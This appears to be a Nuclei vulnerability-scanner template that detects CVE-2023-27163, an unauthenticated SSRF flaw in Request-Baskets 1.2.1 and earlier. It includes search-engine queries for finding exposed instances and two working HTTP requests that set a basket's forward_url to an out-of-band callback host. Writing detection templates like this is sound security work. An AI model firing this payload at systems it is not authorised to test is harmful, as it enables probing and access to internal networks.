id: CVE-2023-27163

info:
  name: Request-Baskets <= 1.2.1 - Server Side Request Forgery
  author: Jaenact
  severity: medium
  description: |
    Request-Baskets <= 1.2.1 allows unauthenticated SSRF via the forward_url parameter when creating a new basket.
  impact: |
    Attackers can perform SSRF attacks to access internal network resources, scan internal systems, or interact with services that should not be accessible from external networks.
  remediation: |
    Upgrade to Request-Baskets version 1.2.2 or later that addresses this SSRF vulnerability.
  reference:
    - https://github.com/darklynx/request-baskets
    - https://hub.docker.com/r/darklynx/request-baskets
    - https://infosecwriteups.com/exploit-analysis-request-baskets-v1-2-1-server-side-request-forgery-ssrf-688fffd1f424
    - https://nvd.nist.gov/vuln/detail/CVE-2023-27163
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 6.5
    cve-id: CVE-2023-27163
    epss-score: 0.9332
    epss-percentile: 0.99819
    cwe-id: CWE-918
    cpe: cpe:2.3:a:rbaskets:request_baskets:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: darklynx
    product: request-baskets
    shodan-query: http.html:"Request-Baskets"
    fofa-query: body="Request-Baskets"
  tags: cve,cve2023,ssrf,request-baskets,oast,proxy,vkev,vuln

flow: http(1) && http(2)

variables:
  bucketname: "{{rand_base(7)}}"

http:
  - raw:
      - |
        POST /api/baskets/{{bucketname}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "forward_url": "http://{{interactsh-url}}",
          "proxy_response": true,
          "insecure_tls": false,
          "expand_path": true,
          "capacity": 250
        }

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 201'
          - 'contains(body, "token\":")'
          - 'contains(content_type, "application/json")'
        condition: and
        internal: true

  - raw:
      - |
        GET /{{bucketname}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
# digest: 4a0a0047304502204ce6e91e61d875c7b378150f096a8c96cc533bd01eb17e13accc081cfe075d52022100b0db65ca822e2fe7dd7dd6c16844ad8b494109ad1439aaa14687be5f6533231e:922c64590222798bb761d5b6d8e72950